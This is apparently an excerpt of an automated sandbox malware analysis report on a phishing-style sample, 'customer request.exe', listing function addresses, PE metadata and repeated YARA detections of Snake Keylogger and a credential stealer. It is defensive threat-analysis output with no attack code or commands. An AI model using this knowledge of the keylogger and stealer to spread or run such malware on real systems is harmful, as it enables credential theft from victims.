            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9CA7013_2_02A9CA70
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9EE6813_2_02A9EE68
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A96F0913_2_02A96F09
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9BD2813_2_02A9BD28
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9CD5213_2_02A9CD52
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9E38813_2_02A9E388
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9E37913_2_02A9E379
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9357213_2_02A93572
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_02A9BEF013_2_02A9BEF0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_052511C013_2_052511C0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525846013_2_05258460
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525387013_2_05253870
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525004013_2_05250040
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05257B7013_2_05257B70
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525B93013_2_0525B930
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525090013_2_05250900
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E90813_2_0525E908
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05250D6013_2_05250D60
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525ED6013_2_0525ED60
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525B94013_2_0525B940
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05250D5113_2_05250D51
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525ED5013_2_0525ED50
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525F1A913_2_0525F1A9
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_052511B013_2_052511B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525F1B813_2_0525F1B8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525BD8813_2_0525BD88
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05257D9013_2_05257D90
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525BD9813_2_0525BD98
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525C1E013_2_0525C1E0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525C1F013_2_0525C1F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525000613_2_05250006
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525DC0013_2_0525DC00
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525386213_2_05253862
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E04B13_2_0525E04B
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E05813_2_0525E058
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_052504A013_2_052504A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E4A013_2_0525E4A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E4B013_2_0525E4B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525049113_2_05250491
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525B4E813_2_0525B4E8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_052508F013_2_052508F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525E8F813_2_0525E8F8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525B4D713_2_0525B4D7
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525D34013_2_0525D340
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525D35013_2_0525D350
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525D7A813_2_0525D7A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525D79813_2_0525D798
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_052573E813_2_052573E8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525DBF113_2_0525DBF1
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525C63813_2_0525C638
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525F60013_2_0525F600
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525F61013_2_0525F610
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525FA6813_2_0525FA68
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525C64813_2_0525C648
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525FA5913_2_0525FA59
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525CAA013_2_0525CAA0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525CA9013_2_0525CA90
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525CEEB13_2_0525CEEB
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0525CEF813_2_0525CEF8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696B6E813_2_0696B6E8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696860813_2_06968608
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696AA5813_2_0696AA58
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696D67013_2_0696D670
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696C38813_2_0696C388
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06968BF213_2_06968BF2
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696B0A013_2_0696B0A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696A40813_2_0696A408
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696D02813_2_0696D028
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069611A013_2_069611A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696C9D813_2_0696C9D8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696BD3813_2_0696BD38
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06965EB813_2_06965EB8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696B6D913_2_0696B6D9
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06965EC813_2_06965EC8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696561813_2_06965618
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696560B13_2_0696560B
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696AA4813_2_0696AA48
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06965A7013_2_06965A70
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696D66213_2_0696D662
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06965A6013_2_06965A60
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069633B813_2_069633B8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069633A813_2_069633A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06966BD013_2_06966BD0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06966BC113_2_06966BC1
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696A3F813_2_0696A3F8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696631313_2_06966313
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696373013_2_06963730
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696632013_2_06966320
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696677813_2_06966778
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696C37813_2_0696C378
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696676813_2_06966768
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696749713_2_06967497
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696049813_2_06960498
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696B08F13_2_0696B08F
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696048813_2_06960488
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069628B013_2_069628B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069674A813_2_069674A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069678F013_2_069678F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069608F013_2_069608F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069608E013_2_069608E0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696001D13_2_0696001D
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696D01813_2_0696D018
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696280713_2_06962807
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696280913_2_06962809
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696443013_2_06964430
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696705013_2_06967050
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696004013_2_06960040
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696704013_2_06967040
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696519813_2_06965198
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696518B13_2_0696518B
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069681B013_2_069681B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069681A013_2_069681A0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696C9C813_2_0696C9C8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_069685F813_2_069685F8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696790013_2_06967900
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06960D3913_2_06960D39
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696BD2813_2_0696BD28
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06967D5813_2_06967D58
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06960D4813_2_06960D48
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_06967D4813_2_06967D48
            Source: customer request.exeStatic PE information: invalid certificate
            Source: customer request.exe, 00000000.00000002.1721290300.000000000328A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1722509797.0000000004258000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1726442804.0000000007E8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebWhS.exeF vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1719943268.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1722509797.0000000004A6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1726187313.0000000007DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs customer request.exe
            Source: customer request.exe, 00000000.00000002.1720699808.0000000002EE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs customer request.exe
            Source: customer request.exe, 00000008.00000002.4134311882.0000000000D57000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs customer request.exe
            Source: customer request.exeBinary or memory string: OriginalFilenamebWhS.exeF vs customer request.exe
            Source: customer request.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
